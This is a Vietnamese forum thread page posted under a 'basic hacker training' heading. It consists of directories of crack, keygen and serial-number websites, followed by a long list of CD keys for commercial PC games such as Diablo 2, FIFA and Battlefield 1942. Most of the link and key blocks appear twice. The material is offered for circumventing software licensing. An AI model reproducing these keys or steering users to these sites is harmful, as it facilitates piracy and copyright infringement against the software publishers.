http://www.ego1st.cjb.net/
http://kickme.to/tnt
http://meubrfree.com.br/~trwhome/
http://zor.org/vb4free/
http://kickme.to/winblowz98/
http://www.siker.org/flash/en_main.htm
http://flowers.pp.ru/rcz/a1.htm
http://x-filez.harem2.pl/index_y.htm
http://netchat.3322.net/service/register/zcma.htm
Các trang thường vào:
www.keygen.ru
www.crackserver.com
www.crackdb.com
P/S: Các bạn chú ý là khi vào một số các trang này sẽ có các hình ảnh quảng cáo xxx.
Crack Sites:
AllCracks.Net, Andr.Net, Crack.Ms,
Crackz.Ws, CrackArchive.Com, CrackDb.Com, CrackzPlanet.Com,
CrackWay.Com, MsCracks.Com, CrackPortal.Com, TheCracks.Us,
KeyGen.Ru
Serial Sites:
Seriall.Com, FreeSerials.Com, SerialSite.Com, Serials.Ws,
Andr.Net, SerialKey.Net, SerialArchive.Com, CrackzPlanet.Com,
MsCracks.Com, CrackPortal.Com, KeyGen.Name, TheKeys.Ws,
FreeSerials.Ws, FreeSerials.Spb.Ru, Serial.220volt.Info,
SerialCodes.Net
Cover Site:
CoverTarget.Com, CoverAll.Come.To, CoverIsland.Com
http://astalavista.box.sk/
http://www.crackcrawler.net/cgi/search.php4 the BEST metasearch for cracks
http://kickme.to/crackwar very good can search 23 engines from 1 page
http://www.megasearch.ws/ search the main engines from here
http://www.bugs2k.com/ a good search site with minimal popups
http://www.andr.net/index.php another good one
http://crackazoid.com/
http://keygen.net/s.htm
http://www.hksoftking.com/v.php
http://www.dream-avenue.com/docky/leportail.htm
http://www.cracks.spb.ru/?... -porn banners
http://www.akribo-search.de.vu/ porn pop ups
http://allseek.info/ too many pop ups
http://www.cracks.am/s.x LOTS of ***** pop ups
http://www.search-explorer.net/installer.php
http://www.toflo.de/htm/link.htm
http://www.ixquick.com/
http://keygen.freeweb.hu/index/m.htm
Cracks and Serials
http://www.eminence.gulli.com/
http://forum.royaume.com/
http://key.winzheng.com/
http://www.exelenz.fr.st/
http://antares666.da.ru/
http://www.deamoncrack.fr.st/
http://hide.at/apizza
http://www.n-genworld.com/
http://www.reptilecracker.com/
http://kickme.to/desperate
http://mp2k.da.ru/
http://kickme.to/tsrh
http://kickme.to/pc2k/
http://kickme.to/dbc
http://zor.org/tnone/
http://dbz.6x.to/
http://evc.to/cracks/
http://www.ego1st.cjb.net/
http://kickme.to/tnt
http://meubrfree.com.br/~trwhome/
http://zor.org/vb4free/
http://kickme.to/winblowz98/
http://www.siker.org/flash/en_main.htm
http://flowers.pp.ru/rcz/a1.htm
http://x-filez.harem2.pl/index_y.htm
http://netchat.3322.net/service/register/zcma.htm
Các trang thường vào:
www.keygen.ru
www.crackserver.com
www.crackdb.com
P/S: Các bạn chú ý là khi vào một số các trang này sẽ có các hình ảnh quảng cáo xxx.
redx1412- Kẻ khủng bố
- Tổng số bài gửi : 542
Join date : 10/06/2009
Age : 30
Đến từ : Dark World
Re: chương trình đào tạo hacker ( khóa cơ bản )
CD key các trò chơi
--------------------------------------------------------------------------------
Age of Mythology: XDWXF-2JCVG-VTX6T-6KYQ9-QDC4G
Age of Mythology: RD4D4-B94XK-QVWFP-K9PJD-GVRV3
Age of Mythology: QVW83-4MC67-FDPTH-49PT8-6HGRD
Alien vs Predators 2: rec6-fab6-gen7-duf7-4344
American McGee's Alice: 2000-0112900-0010978-3379
American McGee's Alice: 6453-7884462-9832102-6449
American McGee's Alice: 3187-0271244-1206233-7747
Aquanox 1: 0007-3734-9fc3-7b9a
Aquanox 1: 1005-493d-c922-17d3
Aquanox 1: 3005-b2a8-a830--358
Aquanox 1: 5001-7010-6f50-3b03
Aquanox 1: 5005-4db8-65f3-fdcf
Aquanox 1: 6005-6173-6545-aa9e
Aquanox 1: 8001-2d62-c6a0-19b5
Atrox: 9073-7741-7910-04703
Battlefield 1942: 0901-4486830-1635751-2230
Battlefield 1942: 0901-2857682-5631883-1206
Battlefield 1942: 0901-5424665-0520057-1232
Battlefield 1942: 5000-0000000-0000000-1318
Battlefield 1942 Road to Rome: 4906-9626506-2206381-5368
Battlefield 1942 Road to Rome: 8456-5984327-7540897-4330
Battlefield 1942 Road to Rome: 2256-2303935-1818093-2776
Battlefield 1942 Secret Weapons of WWII: 0901-2113787-5776636-3338
Battlefield 1942 Secret Weapons of WWII: 0901-0120062-1518273-2120
Battlefield 1942 Secret Weapons of WWII: 4509-4188686-4654577-0456
Big Scale Racing (IS: 8060-7476-B821-5B42
Big Scale Racing (IS: FC43-5961-5D24-B071
Big Scale Racing (IS: 1EGO-E5AI-66SG-23AY
Big Scale Racing (IS: 7DGE-64NI-94US-C201
Big Scale Racing (IS: 7F34-7F78-56AB-8FEF
Black & White: 0901-3324366-4702210-2081
Black & White: 3609-8077379-3488008-4192
Black & White: 0239-3149551-0576661-5531
Black & White Creatures Isle: 2394-1529829-3567371-5124
Black & White Creatures Isle: 7655-0015767-1953964-2153
Black & White Creatures Isle: 3379-8714263-1181459-4465
Call of Duty: 82SH-E2WH-KPYY-EX8E-A14D
Call of Duty: DEUD-WYDE-4W42-YKDW-F34D
Call of Duty: WDWE-YW8Y-XWWD-TYWY-1EAF
Call of Duty: TXSK-WGDY-WDSX-WPTW-1A7C
C & C Generals: 1116-0553323-4206438-6378
C & C Generals: 1529-4165093-5283471-0961
C & C Generals: 1554-3519303-5863106-2960
C & C Generals: Zero Hour: AZNE-P748-W8C4-SSWS-4E8S
C & C Generals: Zero Hour: PA7F-J4AX-TD9N-92FZ-4BUR
C & C Generals: Zero Hour: PA7F-J4AX-TD9N-92FZ-4BUR
C & C Generals: Zero Hour: PA7F-J4AX-TD9N-92FZ-4BUR
C & C Red Alert 2: 020736-428526-011875-6507
C & C Red Alert 2: 022121-905624-825895-4992
C & C Red Alert 2: 030645-633345-452378-0580
C & C Red Alert 2 Yuri's Revenge: 303440-222764-534487-73438
C & C Red Alert 2 Yuri's Revenge: 662875-454133-344823-08464
C & C Red Alert 2 Yuri's Revenge: 075420-663711-111417-71038
C & C Renegade: 056894-929488-118387-9679
C & C Renegade: 056762-051968-047885-5190
C & C Renegade: 056968-762379-840140-8243
C & C Renegade: 056384-165067-858508-3234
C & C Renegade: 056120-230755-848844-5718
C & C Renegade: 056198-391485-391948-9024
C & C Renegade: 056924-738095-184588-5738
C & C Renegade: 056038-648693-313100-7109
C & C Renegade: 056493-234166-827916-2001
C & C Renegade: 056430-651581-593164-8339
C & C Tiberian Sun: 008302-889914-451062-6091
C & C Tiberian Sun: 010436-881681-537098-4027
C & C Tiberian Sun: 263877 906189 200291 2883
C & C Tiberian Sun: 266127 314485 240039 3713
C & C Tiberian Sun: 781866 616595 819275 5016
C & C Tiberian Sun: 781866 616595 819275 5016
Chaser: 52QJY-10K8V-CLNPI-1EISW-7VNP3
Chaser: 3RVXB-6ICGE-PYX7T-KJ9L9-LSG5H
Chaser: 2QIMX-NU6MT-O74UI-D9OS0-XW4N5
Chaser: 63PRZ-360N5-7SWUY-XR0A5-DIFCA
Chrome: MZIC3-MLNTS-VL45L-8MG26
Chrome: 53ZFH-CKE6T-3TPXJ-82W00
Chrome: XICVC-IZM6A-GTAHP-I4X6H
Clive Barker's Undying: 2500-0911911-09
Commanche 4: 3s2d-flt1-cls2-rule-7865
Commanche 4: KGQJ-8M68-7JQW-DUCV-WLC6
Cricket Jr 3.2.25: CJr1-94805-YZSVI-SQ6Lv
Dark Age of Camelot: HAVDVIL-YATYBA9-WX18VXE-MP43QAQ-HUGUTMX
Dark Reign 2: gad6-teb4-cup9-pap6-5529
Deep Raider: 102050000000001
Delta Force 2: JTUH-LTHD-BCZV-HFBY-SSNN
Delta Force 3: N5E3-YXH2-G983-9WYB-B3ZS
Delta Force 3: N7Q9-UX77-KZ3Z-332A-W4TR
Delta Force Task Force Dagger: 72YL-R4SB-GKG6-3WKS-HQ27
Delta Force Black Hawk Down: Q96Y-LTGO-YVYE-GJBA-CWGV
Delta Force Black Hawk Down: 88ER-GPOV-KCWM-EUPP-HLWP
Delta Force Black Hawk Down: QKUG-DNPY-UAHT-HYFQ-LRDH
Der erste Kaiser: RED2-DAD2-RAD2-DAD2-888
Devastation: 5B36F-976AA-6A471-58B8D-92B7B
Devastation: GUHW6-TC9VN-IMSAA-9B162-6RBR9
Devastation: BQEE6-UWZM3-IMSSZ-6A2B1-3D5F3
Diablo 2: LOD 6PNP-D7PG-HZ8M-PZNP
Diablo 2: 4CHW-RT4M-9JPN-2G4B
Diablo 2: 6EPM-27Z9-99D2-KM7B
Diablo 2: 79ER-XTM4-HNDK-DWE6
Diablo 2: 848J-XN72-9NZP-82FP
Diablo 2: 879K-9G4N-B9CV-2CTK
Diablo 2: 8DRR-VTH6-RGZ7-RT2V
Diablo 2: B2PF-JGJ9-J74C-H7T2
Diablo 2: BFCT-F4MN-RCH7-RDCF
Diablo 2: EJ6V-BT4D-9NDC-77TF
Diablo 2: FBWG-8NME-GZDW-7H9E
Diablo 2: GHXX-829D-2M9T-H48W
Diablo 2: HJ4E-N2MJ-XHXP-NZXV
Diablo 2: J2J8-MDKZ-8G47-4KXB
Diablo 2: J9NC-FTHN-PC4N-7RHH
Diablo 2: KDZD-DR7W-92DX-FR8J
Diablo 2: KFJH-WDNF-HGXT-HEH6
Diablo 2: N64H-7J9X-JMCN-NG74
Diablo 2: NDGX-TGNK-XPGE-GGWR
Diablo 2: PHFF-ZGZX-ZXKZ-2G7C
Diablo 2: TBKJ-B79J-N6NJ-86MB
Diablo 2: TPDC-HWNF-NVMV-VCXV
Diablo 2: VV86-CGKN-EVBP-T7TC
Diablo 2: WEJ2-X28V-R727-VC2T
Diablo 2: WVE6-RTNC-TFHG-EVXP
Diablo 2: XWMN-D97T-6E6H-TPM2
Diablo 2 LoD: HFCN-H9DD-PBGE-G9K9
Diablo 2 LoD: EV4D-GGRZ-8DVH-H9D4
Diablo 2 LoD: 6689-JDRR-B6DC-7WKZ
Drome Racers: 0252-2798728-8952823-5920
Drome Racers: 2186-7410760-3617868-5920
Drome Racers: 2574-0811768-6410528-5503
Drome Racers: 1439-8808778-3837107-0023
Drome Racers: 3496-5109968-3484992-4129
Drome Racers: 5533-3743808-8068198-0827
Drome Racers: 9722-8289078-1586124-0933
Drome Racers: 2586-2653924-6182119-2114
Drome Racers: 7629-5200391-8195325-1003
Drome Racers: 2586-7722941-9698255-6023
Drome Racers: 4912-5083939-6799769-1518
Drome Racers: 3576-6582544-1616335-0011
Drome Racers: 5328-2536186-2146291-0234
Earth 2150 - Lost Souls: 7XJC-UD2E-E83L-Z5T5
Elite Force Exp. Pack: C5-0CLS-0FLT-00RA-0001
Elite Force: F9YN-C433-K9RB-4RTP-15
Elite Force: HN3M-HRYP-R9TH-4HXM-4D
Elite Force: p3h6-k3ff-m4rc-b4yr-b7
Emperor: Battle for Dune: 036642-256734-246754-5204
Emperor: Battle for Dune: 036666-666666-666666-2921
Emperor: Battle for Dune: 038785-895894-747474-9011
Emperor: Rise of the Middle Kingdom : BAC9-RAL8-SAS2-SAX2-9999
Emperor: Rise of the Middle Kingdom : RED2-DAD2-RAD2-DAD2-8888
Emperor: Rise of the Middle Kingdom : BAB2-DAD2-BAB2-DAD4-2247
Emperor: Rise of the Middle Kingdom : GAG2-FAF2-GAG2-FAF5-2257
Emperor: Rise of the Middle Kingdom : BAB2-RAL2-BAB2-FAF5-2279
Emperor: Rise of the Middle Kingdom : RAD2-RAL2-RAD2-FAF3-2289
Emperor: Rise of the Middle Kingdom : RAD2-RAD2-RAD2-RAD2-2247
Emperor: Rise of the Middle Kingdom : TAD2-TAD2-TAD2-TAD5-2253
Emperor: Rise of the Middle Kingdom : BAD2-BAD2-BAD2-BAD4-2267
Emperor: Rise of the Middle Kingdom : DAD2-MAC2-DAD2-MAC4-2269
Emperor: Rise of the Middle Kingdom : GAD2-ZUC2-GAD2-ZUC3-2225
Emperor: Rise of the Middle Kingdom : RED2-MAC2-RED2-BAD2-2269
Emperor: Rise of the Middle Kingdom : RED2-DED2-RED2-DED5-2228
Emperor: Rise of the Middle Kingdom : BUG2-GER2-MAD2-BAT3-2236
Emperor: Rise of the Middle Kingdom : BUG2-GER2-MAT2-MAD3-2289
Emperor: Rise of the Middle Kingdom : BUG2-GER2-GER2-MAN2-2284
Emperor: Rise of the Middle Kingdom : BAD2-GER2-BUG2-GER2-2286
Emperor: Rise of the Middle Kingdom : BAD2-GER2-MAN2-MAN3-2236
Emperor: Rise of the Middle Kingdom : RUG2-GER2-MAN2-MAN5-2277
Emperor: Rise of the Middle Kingdom : RED2-RAG2-RAG2-RED2-2288
Emperor: Rise of the Middle Kingdom : BED2-NAP2-NAP2-BED3-2279
Emperor: Rise of the Middle Kingdom : NAP2-PED2-CAT2-NAP5-2289
Emperor: Rise of the Middle Kingdom : RAP2-PER2-BAD2-CAT2-2238
Emperor: Rise of the Middle Kingdom : BAD2-MAG2-SAD2-FAG3-2269
Empire Earth: LEF7-BAF6-SEM4-3224
Empire Earth: Art of Conquest: GER2-MAN2-RAP2-PER5-2252
Empires: Dawn of the Modern World: ZWH8-AXWN-KJKG-KPJC-67D7
F1 2001: 1500-5165912-5287147-7137
F1 2001: 2001-0020601-0010978-6694
F1 2001: 4451-9920019-4538550-6912
F1 2002: 7931-9865028-6024865-1156
F1 2002: 4121-9850649-2126557-0378
F1 2002: 0024-0570691-0782215-1357
F1 Challenge 99-02: 2608-7224053-9482510-1427
F1 Challenge 99-02: 4002-7462491-1587828-5339
F1 Challenge 99-02: 4107-5802894-0367197-4626
F1 Championship 2000: 4500-3623232-6755239-5676
F1 Championship Season 2000: 1500-8510031-6424109-3971
FIFA 2001: 4521-0294200-3549899-3446
FIFA 2002: 1111-1111111-1111111-1111
FIFA 2002: 2501-2973603-4208783-4109
FIFA 2002: 0307-3010048-1794956-3600
FIFA 2003: 3133-7313-3731-3KGH
FIFA 2003: DEVI-ANCE-2002-XF7B
FIFA 2003: DEVI-ANCE-RULE-ZF79
FIFA 2003: H9YN-EPTB-Z34B-6PHQ
FIFA 2004: AFTK-UGXM-ZRL8-5CE4-GDEV
FIFA 2004: EWA2-G7EU-FN4X-8EQP-UDEV
FIFA 2004: S944-J5NR-YAE4-ASYC-CDEV
FIFA Worldcup 2002: 5501-2376301-3049573-5562
FIFA Worldcup 2002: 0901-3482564-1716312-0441
FIFA Worldcup 2002: 2485-6090299-2262218-5541
Freedom Force: 3615-4209737-2601657-1161
Freedom Force: 7247-9399855-7873300-1472
Freedom Force: 1206-6163380-6139944-3215
Freedom Fighters: PWC4-G4AF-TCGH-2YMY-RR3L
Freedom Fighters: PZ77-TAAT-T973-795W-7RYE
Freedom Fighters: PN66-ZPAM-TBCJ-A9M7-XU5Z
Galactic Civilizations: DN-500792-GC1-CLS4FLT8XT
Galactic Civilizations: DN-551264-GC1-FF471EE3C4
Galactic Civilizations: DN-502081-GC1-823218E2C3
Global Ops: 5000-0000000-0000000-5021
Gore: 5FFD-956F-59B8-5DB8
Gore: 4FFD-67A0-7A29-4D52
Gore: 8000-7267-AFC8-106B
Ground Control: RAC2-RAL2-CAS3-RAD3-3542
Ground Control: GYB6 BAC4 NEB6 LYS2 5464
GTA 3: Vice City: 1234-5678-9012-44445
--------------------------------------------------------------------------------
Age of Mythology: XDWXF-2JCVG-VTX6T-6KYQ9-QDC4G
Age of Mythology: RD4D4-B94XK-QVWFP-K9PJD-GVRV3
Age of Mythology: QVW83-4MC67-FDPTH-49PT8-6HGRD
Alien vs Predators 2: rec6-fab6-gen7-duf7-4344
American McGee's Alice: 2000-0112900-0010978-3379
American McGee's Alice: 6453-7884462-9832102-6449
American McGee's Alice: 3187-0271244-1206233-7747
Aquanox 1: 0007-3734-9fc3-7b9a
Aquanox 1: 1005-493d-c922-17d3
Aquanox 1: 3005-b2a8-a830--358
Aquanox 1: 5001-7010-6f50-3b03
Aquanox 1: 5005-4db8-65f3-fdcf
Aquanox 1: 6005-6173-6545-aa9e
Aquanox 1: 8001-2d62-c6a0-19b5
Atrox: 9073-7741-7910-04703
Battlefield 1942: 0901-4486830-1635751-2230
Battlefield 1942: 0901-2857682-5631883-1206
Battlefield 1942: 0901-5424665-0520057-1232
Battlefield 1942: 5000-0000000-0000000-1318
Battlefield 1942 Road to Rome: 4906-9626506-2206381-5368
Battlefield 1942 Road to Rome: 8456-5984327-7540897-4330
Battlefield 1942 Road to Rome: 2256-2303935-1818093-2776
Battlefield 1942 Secret Weapons of WWII: 0901-2113787-5776636-3338
Battlefield 1942 Secret Weapons of WWII: 0901-0120062-1518273-2120
Battlefield 1942 Secret Weapons of WWII: 4509-4188686-4654577-0456
Big Scale Racing (IS: 8060-7476-B821-5B42
Big Scale Racing (IS: FC43-5961-5D24-B071
Big Scale Racing (IS: 1EGO-E5AI-66SG-23AY
Big Scale Racing (IS: 7DGE-64NI-94US-C201
Big Scale Racing (IS: 7F34-7F78-56AB-8FEF
Black & White: 0901-3324366-4702210-2081
Black & White: 3609-8077379-3488008-4192
Black & White: 0239-3149551-0576661-5531
Black & White Creatures Isle: 2394-1529829-3567371-5124
Black & White Creatures Isle: 7655-0015767-1953964-2153
Black & White Creatures Isle: 3379-8714263-1181459-4465
Call of Duty: 82SH-E2WH-KPYY-EX8E-A14D
Call of Duty: DEUD-WYDE-4W42-YKDW-F34D
Call of Duty: WDWE-YW8Y-XWWD-TYWY-1EAF
Call of Duty: TXSK-WGDY-WDSX-WPTW-1A7C
C & C Generals: 1116-0553323-4206438-6378
C & C Generals: 1529-4165093-5283471-0961
C & C Generals: 1554-3519303-5863106-2960
C & C Generals: Zero Hour: AZNE-P748-W8C4-SSWS-4E8S
C & C Generals: Zero Hour: PA7F-J4AX-TD9N-92FZ-4BUR
C & C Generals: Zero Hour: PA7F-J4AX-TD9N-92FZ-4BUR
C & C Generals: Zero Hour: PA7F-J4AX-TD9N-92FZ-4BUR
C & C Red Alert 2: 020736-428526-011875-6507
C & C Red Alert 2: 022121-905624-825895-4992
C & C Red Alert 2: 030645-633345-452378-0580
C & C Red Alert 2 Yuri's Revenge: 303440-222764-534487-73438
C & C Red Alert 2 Yuri's Revenge: 662875-454133-344823-08464
C & C Red Alert 2 Yuri's Revenge: 075420-663711-111417-71038
C & C Renegade: 056894-929488-118387-9679
C & C Renegade: 056762-051968-047885-5190
C & C Renegade: 056968-762379-840140-8243
C & C Renegade: 056384-165067-858508-3234
C & C Renegade: 056120-230755-848844-5718
C & C Renegade: 056198-391485-391948-9024
C & C Renegade: 056924-738095-184588-5738
C & C Renegade: 056038-648693-313100-7109
C & C Renegade: 056493-234166-827916-2001
C & C Renegade: 056430-651581-593164-8339
C & C Tiberian Sun: 008302-889914-451062-6091
C & C Tiberian Sun: 010436-881681-537098-4027
C & C Tiberian Sun: 263877 906189 200291 2883
C & C Tiberian Sun: 266127 314485 240039 3713
C & C Tiberian Sun: 781866 616595 819275 5016
C & C Tiberian Sun: 781866 616595 819275 5016
Chaser: 52QJY-10K8V-CLNPI-1EISW-7VNP3
Chaser: 3RVXB-6ICGE-PYX7T-KJ9L9-LSG5H
Chaser: 2QIMX-NU6MT-O74UI-D9OS0-XW4N5
Chaser: 63PRZ-360N5-7SWUY-XR0A5-DIFCA
Chrome: MZIC3-MLNTS-VL45L-8MG26
Chrome: 53ZFH-CKE6T-3TPXJ-82W00
Chrome: XICVC-IZM6A-GTAHP-I4X6H
Clive Barker's Undying: 2500-0911911-09
Commanche 4: 3s2d-flt1-cls2-rule-7865
Commanche 4: KGQJ-8M68-7JQW-DUCV-WLC6
Cricket Jr 3.2.25: CJr1-94805-YZSVI-SQ6Lv
Dark Age of Camelot: HAVDVIL-YATYBA9-WX18VXE-MP43QAQ-HUGUTMX
Dark Reign 2: gad6-teb4-cup9-pap6-5529
Deep Raider: 102050000000001
Delta Force 2: JTUH-LTHD-BCZV-HFBY-SSNN
Delta Force 3: N5E3-YXH2-G983-9WYB-B3ZS
Delta Force 3: N7Q9-UX77-KZ3Z-332A-W4TR
Delta Force Task Force Dagger: 72YL-R4SB-GKG6-3WKS-HQ27
Delta Force Black Hawk Down: Q96Y-LTGO-YVYE-GJBA-CWGV
Delta Force Black Hawk Down: 88ER-GPOV-KCWM-EUPP-HLWP
Delta Force Black Hawk Down: QKUG-DNPY-UAHT-HYFQ-LRDH
Der erste Kaiser: RED2-DAD2-RAD2-DAD2-888
Devastation: 5B36F-976AA-6A471-58B8D-92B7B
Devastation: GUHW6-TC9VN-IMSAA-9B162-6RBR9
Devastation: BQEE6-UWZM3-IMSSZ-6A2B1-3D5F3
Diablo 2: LOD 6PNP-D7PG-HZ8M-PZNP
Diablo 2: 4CHW-RT4M-9JPN-2G4B
Diablo 2: 6EPM-27Z9-99D2-KM7B
Diablo 2: 79ER-XTM4-HNDK-DWE6
Diablo 2: 848J-XN72-9NZP-82FP
Diablo 2: 879K-9G4N-B9CV-2CTK
Diablo 2: 8DRR-VTH6-RGZ7-RT2V
Diablo 2: B2PF-JGJ9-J74C-H7T2
Diablo 2: BFCT-F4MN-RCH7-RDCF
Diablo 2: EJ6V-BT4D-9NDC-77TF
Diablo 2: FBWG-8NME-GZDW-7H9E
Diablo 2: GHXX-829D-2M9T-H48W
Diablo 2: HJ4E-N2MJ-XHXP-NZXV
Diablo 2: J2J8-MDKZ-8G47-4KXB
Diablo 2: J9NC-FTHN-PC4N-7RHH
Diablo 2: KDZD-DR7W-92DX-FR8J
Diablo 2: KFJH-WDNF-HGXT-HEH6
Diablo 2: N64H-7J9X-JMCN-NG74
Diablo 2: NDGX-TGNK-XPGE-GGWR
Diablo 2: PHFF-ZGZX-ZXKZ-2G7C
Diablo 2: TBKJ-B79J-N6NJ-86MB
Diablo 2: TPDC-HWNF-NVMV-VCXV
Diablo 2: VV86-CGKN-EVBP-T7TC
Diablo 2: WEJ2-X28V-R727-VC2T
Diablo 2: WVE6-RTNC-TFHG-EVXP
Diablo 2: XWMN-D97T-6E6H-TPM2
Diablo 2 LoD: HFCN-H9DD-PBGE-G9K9
Diablo 2 LoD: EV4D-GGRZ-8DVH-H9D4
Diablo 2 LoD: 6689-JDRR-B6DC-7WKZ
Drome Racers: 0252-2798728-8952823-5920
Drome Racers: 2186-7410760-3617868-5920
Drome Racers: 2574-0811768-6410528-5503
Drome Racers: 1439-8808778-3837107-0023
Drome Racers: 3496-5109968-3484992-4129
Drome Racers: 5533-3743808-8068198-0827
Drome Racers: 9722-8289078-1586124-0933
Drome Racers: 2586-2653924-6182119-2114
Drome Racers: 7629-5200391-8195325-1003
Drome Racers: 2586-7722941-9698255-6023
Drome Racers: 4912-5083939-6799769-1518
Drome Racers: 3576-6582544-1616335-0011
Drome Racers: 5328-2536186-2146291-0234
Earth 2150 - Lost Souls: 7XJC-UD2E-E83L-Z5T5
Elite Force Exp. Pack: C5-0CLS-0FLT-00RA-0001
Elite Force: F9YN-C433-K9RB-4RTP-15
Elite Force: HN3M-HRYP-R9TH-4HXM-4D
Elite Force: p3h6-k3ff-m4rc-b4yr-b7
Emperor: Battle for Dune: 036642-256734-246754-5204
Emperor: Battle for Dune: 036666-666666-666666-2921
Emperor: Battle for Dune: 038785-895894-747474-9011
Emperor: Rise of the Middle Kingdom : BAC9-RAL8-SAS2-SAX2-9999
Emperor: Rise of the Middle Kingdom : RED2-DAD2-RAD2-DAD2-8888
Emperor: Rise of the Middle Kingdom : BAB2-DAD2-BAB2-DAD4-2247
Emperor: Rise of the Middle Kingdom : GAG2-FAF2-GAG2-FAF5-2257
Emperor: Rise of the Middle Kingdom : BAB2-RAL2-BAB2-FAF5-2279
Emperor: Rise of the Middle Kingdom : RAD2-RAL2-RAD2-FAF3-2289
Emperor: Rise of the Middle Kingdom : RAD2-RAD2-RAD2-RAD2-2247
Emperor: Rise of the Middle Kingdom : TAD2-TAD2-TAD2-TAD5-2253
Emperor: Rise of the Middle Kingdom : BAD2-BAD2-BAD2-BAD4-2267
Emperor: Rise of the Middle Kingdom : DAD2-MAC2-DAD2-MAC4-2269
Emperor: Rise of the Middle Kingdom : GAD2-ZUC2-GAD2-ZUC3-2225
Emperor: Rise of the Middle Kingdom : RED2-MAC2-RED2-BAD2-2269
Emperor: Rise of the Middle Kingdom : RED2-DED2-RED2-DED5-2228
Emperor: Rise of the Middle Kingdom : BUG2-GER2-MAD2-BAT3-2236
Emperor: Rise of the Middle Kingdom : BUG2-GER2-MAT2-MAD3-2289
Emperor: Rise of the Middle Kingdom : BUG2-GER2-GER2-MAN2-2284
Emperor: Rise of the Middle Kingdom : BAD2-GER2-BUG2-GER2-2286
Emperor: Rise of the Middle Kingdom : BAD2-GER2-MAN2-MAN3-2236
Emperor: Rise of the Middle Kingdom : RUG2-GER2-MAN2-MAN5-2277
Emperor: Rise of the Middle Kingdom : RED2-RAG2-RAG2-RED2-2288
Emperor: Rise of the Middle Kingdom : BED2-NAP2-NAP2-BED3-2279
Emperor: Rise of the Middle Kingdom : NAP2-PED2-CAT2-NAP5-2289
Emperor: Rise of the Middle Kingdom : RAP2-PER2-BAD2-CAT2-2238
Emperor: Rise of the Middle Kingdom : BAD2-MAG2-SAD2-FAG3-2269
Empire Earth: LEF7-BAF6-SEM4-3224
Empire Earth: Art of Conquest: GER2-MAN2-RAP2-PER5-2252
Empires: Dawn of the Modern World: ZWH8-AXWN-KJKG-KPJC-67D7
F1 2001: 1500-5165912-5287147-7137
F1 2001: 2001-0020601-0010978-6694
F1 2001: 4451-9920019-4538550-6912
F1 2002: 7931-9865028-6024865-1156
F1 2002: 4121-9850649-2126557-0378
F1 2002: 0024-0570691-0782215-1357
F1 Challenge 99-02: 2608-7224053-9482510-1427
F1 Challenge 99-02: 4002-7462491-1587828-5339
F1 Challenge 99-02: 4107-5802894-0367197-4626
F1 Championship 2000: 4500-3623232-6755239-5676
F1 Championship Season 2000: 1500-8510031-6424109-3971
FIFA 2001: 4521-0294200-3549899-3446
FIFA 2002: 1111-1111111-1111111-1111
FIFA 2002: 2501-2973603-4208783-4109
FIFA 2002: 0307-3010048-1794956-3600
FIFA 2003: 3133-7313-3731-3KGH
FIFA 2003: DEVI-ANCE-2002-XF7B
FIFA 2003: DEVI-ANCE-RULE-ZF79
FIFA 2003: H9YN-EPTB-Z34B-6PHQ
FIFA 2004: AFTK-UGXM-ZRL8-5CE4-GDEV
FIFA 2004: EWA2-G7EU-FN4X-8EQP-UDEV
FIFA 2004: S944-J5NR-YAE4-ASYC-CDEV
FIFA Worldcup 2002: 5501-2376301-3049573-5562
FIFA Worldcup 2002: 0901-3482564-1716312-0441
FIFA Worldcup 2002: 2485-6090299-2262218-5541
Freedom Force: 3615-4209737-2601657-1161
Freedom Force: 7247-9399855-7873300-1472
Freedom Force: 1206-6163380-6139944-3215
Freedom Fighters: PWC4-G4AF-TCGH-2YMY-RR3L
Freedom Fighters: PZ77-TAAT-T973-795W-7RYE
Freedom Fighters: PN66-ZPAM-TBCJ-A9M7-XU5Z
Galactic Civilizations: DN-500792-GC1-CLS4FLT8XT
Galactic Civilizations: DN-551264-GC1-FF471EE3C4
Galactic Civilizations: DN-502081-GC1-823218E2C3
Global Ops: 5000-0000000-0000000-5021
Gore: 5FFD-956F-59B8-5DB8
Gore: 4FFD-67A0-7A29-4D52
Gore: 8000-7267-AFC8-106B
Ground Control: RAC2-RAL2-CAS3-RAD3-3542
Ground Control: GYB6 BAC4 NEB6 LYS2 5464
GTA 3: Vice City: 1234-5678-9012-44445
redx1412- Kẻ khủng bố
- Tổng số bài gửi : 542
Join date : 10/06/2009
Age : 30
Đến từ : Dark World
Trang 1 trong tổng số 4 trang • 1, 2, 3, 4
Trang 1 trong tổng số 4 trang
Permissions in this forum:
Bạn không có quyền trả lời bài viết